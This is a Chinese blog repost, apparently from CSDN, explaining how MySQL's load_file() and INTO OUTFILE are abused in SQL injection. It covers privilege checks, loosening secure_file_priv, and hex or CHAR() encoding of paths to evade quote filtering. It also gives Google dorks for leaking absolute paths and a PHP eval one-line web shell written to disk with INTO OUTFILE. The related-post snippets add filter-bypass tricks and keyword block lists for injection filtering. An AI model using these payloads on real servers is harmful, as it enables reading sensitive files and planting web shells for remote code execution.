load_file()与into outfile函数详解

最新推荐文章于 2024-01-26 10:18:56 发布
最新推荐文章于 2024-01-26 10:18:56 发布
阅读量2.1k 收藏 10
点赞数 2
文章标签: 数据库 php
原文链接:http://www.cnblogs.com/zaqzzz/p/9353102.html
版权

load_file()函数的使用:

1.使用条件

①有读取文件的权限 r

and (select count(*) from mysql.user)>0
如果返回正常则说明有权限,反之没有

②文件大小不能超过max_allowed_packet

secure_file_priv的值不为NULL

查看mysql是否有对函数load_file(),outfile()函数的限制(securefilepriv的值是否为NULL)

show global variables like '%secure%';

1397720-20180723094658653-1893119537.png

这个情况下没有办法用这些函数,可以到MySQL的配置文件下
修改,Windows下my.ini,linux下my.cnf。在[mysqld]下面添加一行

secure_file_priv =

1397720-20180723094841089-1676459546.png

重启MySQL
1397720-20180723094902391-1385289253.png

出现这个就表明可以了
④必须给出绝对路径

2.注意

1. load_file()函数指定路径是要用到单引号,但是一般魔术引号开启,或者对你输入的内容进行了过滤,这时候转化为十六进制或者ASCII码

比如:d:/test.txt , 构造语句select load_file('d:/test.txt'), 如果进行了单引号过滤,语句会变成select load_file(\'d:/test.txt\') ,可以转化为16进制:0x643A2F746573742E747874(只转路径,不转'') ,或者转化为ASCII码:char(100,58,47,116,101,115,116,46,116,120,116) 构造select load_file(0x643A2F746573742E747874) 或者select load_file(char(100,58,47,116,101,115,116,46,116,120,116))

2.

hex(load_file('exe文件'))查看 exe二进制文件-----以十六进制读取
-------------------

3.爆出路径

①在display_errors = On的情况下,在后边加个错误参数,爆出网站的绝对路径

load_file()读取配置文件

③扫描工具

④googlehacking:

Site:webshell.cc warning

Site:webshell.cc "fatal error"

inurl:phpinfo

outfile

1.当对于单引号过滤的时候,就完犊子了,因为绝对路径必须有单引号,十六进制和ASCII都不行

2.outfile经典一句话
select '<?php eval($_POST[cmd])?>' into outfile 'd:/muma.php'

3.必须要有可写的权限。w

4.如果单引号过滤,能找到phpmyadmin也行

5.linux真的是权限不行,必须给相关的目录包括父目录用户o开启W权限

6.有时候写马的时候会出现这个提示,在这里我开了display_errors
1397720-20180723095831378-627993666.png

但是我去自己服务器看了下确实会写进去。。。。

转载于:https://www.cnblogs.com/zaqzzz/p/9353102.html

weixin_30457465
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MYSQL注入中load_file()函数的进一步应用
07-24
MYSQL注入中load_file()函数的进一步应用
Mysql注入中的outfile、dumpfileload_file函数详解
01-19
在利用sql注入漏洞后期,最常用的就是通过mysql的file系列函数来进行读取敏感文件或者写入webshell,其中比较常用的函数有以下三个 into dumpfile() into outfile() load_file() 我们本次的测试数据如下 读写文件函数调用的限制 因为涉及到在服务器上写入文件,所以上述函数能否成功执行受到参数 secure_file_priv 的影响。官方文档中的描述如下 翻译一下就是 其中当参数 secure_file_priv 为空时,对导入导出无限制 当值为一个指定的目录时,只能向指定的目录导入导出 当值被设置为NULL时,禁止导
sql注入之into outfile语句写入一句话木马
最新发布
m0_63436163的博客
01-26 1214
into outfile 语句用于把表数据导出到一个文本文件中,要想mysql用户对文件进行导入导出,首先要看指定的权限目录。当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下;5)select
输入值/表单提交参数过滤有效防止sql注入的方法
01-21
输入值/表单提交参数过滤,防止sql注入或非法攻击的方法: 复制代码 代码如下: /** * 过滤sql与php文件操作的关键字 * @param string $string * @return string * @author zyb */ private function filter_keyword( $string ) { $keyword = ‘select|insert|update|delete|\’|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile’; $arr = explode(
php防止sql注入代码实例
12-18
放到公用调用文件(如conn数据库链接文件),对所有GET或POST的数据进行过滤特殊字符串,以实现简单有效的SQL注入过滤 复制代码 代码如下:Function inject_check($sql_str) { return eregi(‘select|insert|and|or|update|delete|\’|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile’, $sql_str);}if (inject_check($_SERVER[‘QUERY_STRING’])==1 or inject_check(file_get_contents
MySQL注入绕开过滤的技巧总结
12-16
首先来看GIF操作: 情况一:空格被过滤 使用括号()代替空格,任何可以计算出结果的语句,都可以用括号包围起来; select * from(users)where id=1; 使用注释/**/绕过空格; select * from/**/users/**/where id=1; 情况二:限制from与某种字符组合 在from后加个点.即使用from.来代替from; select * from. users where id=1; 再直接看GIF: 说白了,就是将‘字段名 ‘替换成hex; 这会联想到开始学SQL注入的时候,利用load_file或者into outfile
第四天sql load_file&报错注入简单用法
代码审计
03-05 2335
1. sql注入 使用的前提: a) 需要一个可控的参数点 b) 需要无过滤或者是过滤不充分 插入的payload数据库执行 分类: 按照注入的数据类型: a) 整数型 不需要闭合单双引号 b) 字符型 需要闭合单双引号 按照注入的方式: a) 联合查询注入 b) 报错注入 c) 基于bool的注入 d) 基于时间的注入 e) 堆叠注入 如何快速判断是否存在sql注入? 1.使用单双引号 看是否报错 2.使用四则运算 看是否是整数型 3. 使用bool判断 and 1=1
常见的load_file()读取的敏感信息
blackguest07的博客
01-17 895
load_file() 函数读取敏感文件,这一章就够了。
MySQL中的load_file()如何去使用
qq_50679242的博客
03-17 5061
MySQL的load_file使用方法 我真的为了可以再MySQL中保存图片花了好久时间,希望可以帮助到朋友们,让你们不要浪费这么多时间。 首先我们可以再cmd中使用“ show global VARIABLES like ‘%secure%’; ”语句,会得到以下结果(默认情况下哈) mysql> show global VARIABLES like ‘%secure%’; ±--------------------------------±---------------------------
mysql load file 函数_MySQL使用LOAD_FILE()函数方法总结
weixin_39671374的博客
01-21 2052
在mysql中,load_file()函数读取一个文件并将其内容作为字符串返回。语法load_file(file_name)其中file_name是文件的完整路径。下面是我从一个文件中选择内容的示例:select load_file('/data/test.txt') as result;结果:+------------------------------------------+| result...
sql注入之load_file()函数读取操作系统文件需要权限
m0_63436163的博客
01-25 585
程序需要通过系统API来获取文件读取权限,具体实现取决于操作系统的权限管理方式。在Linux中,可以使用chmod命令设置文件的读权限,但是如果程序运行的用户没有读取该文件的权限,则依然无法读取。load_file()函数的使用需要谨慎,因为一些恶意用户可能会利用该函数获取系统中的敏感文件,从而对系统进行攻击。在进行文件读取操作时,操作系统需要对读取该文件的程序进行权限验证。如果没有相应的权限,程序将无法读取文件,因此获取文件读取权限是进行文件读取操作的必要前提。因此,程序需要以有相应权限的用户身份运行。
Local File Disclosure using SQL Injection
05-29
SQL Injection AKA mother of hacking is one of the notorious and well known vulnerability which has caused lots of damage to cyber world. Researchers has published lots of stuff on different-2 exploitation techniques for conducting various type of attacks including accessing data stored in database, reading/writing code from/to server using load and into outfile in MySQL, performing command execution using SA account in MSSQL. In this paper, we are going to exploit SQL Injection vulnerability in file download function which download file from server on the basis of output returned by vulnerable SQL query.
mysql获取文件后缀名函数_MySQL使用LOAD_FILE()函数方法总结
weixin_34392511的博客
01-18 411
在MySQL中,LOAD_FILE()函数读取一个文件并将其内容作为字符串返回。语法LOAD_FILE(file_name)其中file_name是文件的完整路径。下面是我从一个文件中选择内容的示例:SELECT LOAD_FILE('/data/test.txt') AS Result;结果:+------------------------------------------+| Result...
SQL注入一句话木马(load_file/out file
初学者L_言的博客
11-26 8435
工具 靶机——metasploitable2 环境——DVWA,(low等级下) 菜刀——蚁剑 权限查看 查看mysql是否有对函数load_file(),outfile()函数的限制 (securefilepriv的值是否为NULL) show global variables like '%secure%'; NULL 表示不可用, 空 表示可用 ' order by 2-- 查看字段...
嵌入式面试题总结
weixin_46545987的博客
03-06 872
在复习嵌入式面试题时稍微总结了一下,作为学习笔记!
load_files(加载文本文件)
Klay Ye
12-19 5076
sklearn.datasets.load_files Load text files with categories as subfolder names. https://scikit-learn.org/stable/modules/generated/sklearn.datasets.load_files.html **os.listdir(path) ** 用于返回指定的文件夹包含的文件...
mysql load file 权限_sql注入--高权限,load_file读写文件
weixin_36359110的博客
01-19 1482
select '' into outfile '/var/www/html/1.php';1.MYSQL新特性限制文件写入及替代方法高版本的MYSQL添加了一个新的特性secure_file_priv,该选项限制了mysql导出文件的权限secure_file_priv选项secure_file_priv1、限制mysqld 不允许导入 | 导出--secure_file_prive=null2、...
mysql注入中的outfile、dumpfileload_file函数详解
whatday的专栏
10-29 3081
在利用sql注入漏洞后期,最常用的就是通过mysql的file系列函数来进行读取敏感文件或者写入webshell,其中比较常用的函数有以下三个 into dumpfile() into outfile() load_file() 我们本次的测试数据如下 读写文件函数调用的限制 因为涉及到在服务器上写入文件,所以上述函数能否成功执行受到参数secure_file_priv的影...
SQL注入--Load_file与into outfile
weixin_44940180的博客
08-09 2850
Load_file与into outfile 利用into outfile拿到getshall
load data into file sql语句怎么写
06-12
To load data into a file using SQL, you can use the following statement: ``` SELECT * INTO OUTFILE 'file_path/file_name.txt' FROM table_name; ``` Replace `file_path` with the path to the directory where you want to save the file, `file_name` with the name you want to give the file, and `table_name` with the name of the table you want to export. Note that this statement will only work if you have the necessary permissions to write files in the specified directory. Also, the output file will be in tab-delimited format by default. If you want to use a different delimiter, you can specify it using the `FIELDS TERMINATED BY` option.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值